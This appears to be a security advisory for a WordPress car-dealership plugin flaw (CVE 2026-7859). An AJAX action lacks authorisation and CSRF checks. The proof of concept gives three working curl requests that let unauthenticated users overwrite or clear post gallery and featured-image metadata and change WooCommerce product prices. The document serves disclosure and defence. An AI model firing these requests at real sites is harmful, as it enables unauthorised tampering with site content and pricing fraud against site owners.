Motors Car Dealership & Classified Listings < 1.4.110 – Unauthenticated Post-Meta Write via stm_ajax_add_a_car_media | CVE 2026-7859

Description

The plugin does not have proper authorisation and CSRF checks on one of its AJAX actions, allowing unauthenticated attackers to modify arbitrary post metadata, such as the gallery, featured image and, on WooCommerce sites, product prices.

Proof of Concept

1. Install motors-car-dealership-classified-listings <= 1.4.108
2. Target any post whose stm_car_user meta is unset (every non-listing post: blog posts, pages, WooCommerce products)

Primitive 1 — overwrite gallery and featured image:
curl -s -X POST TARGET/wp-admin/admin-ajax.php \
  -d "action=stm_ajax_add_a_car_media" \
  --data-urlencode "post_id=<POST_ID>" \
  --data-urlencode "media_position_0=4242" \
  --data-urlencode "media_position_1=9999"
Response: {"message":"Listing added","success":true}
gallery meta is now {"0":4242,"1":9999}; _thumbnail_id is now 4242

Primitive 2 — clear gallery and scrub featured image:
curl -s -X POST TARGET/wp-admin/admin-ajax.php \
  -d "action=stm_ajax_add_a_car_media" \
  --data-urlencode "post_id=<POST_ID>"

Primitive 3 — overwrite WooCommerce product price (requires WooCommerce active + pay-per-listing configured):
curl -s -X POST TARGET/wp-admin/admin-ajax.php \
  -d "action=stm_ajax_add_a_car_media" \
  --data-urlencode "post_id=<PRODUCT_ID>" \
  --data-urlencode "redirect_type=pay"
_price is overwritten to the configured pay-per-listing price; pay_per_listing is set to "pay"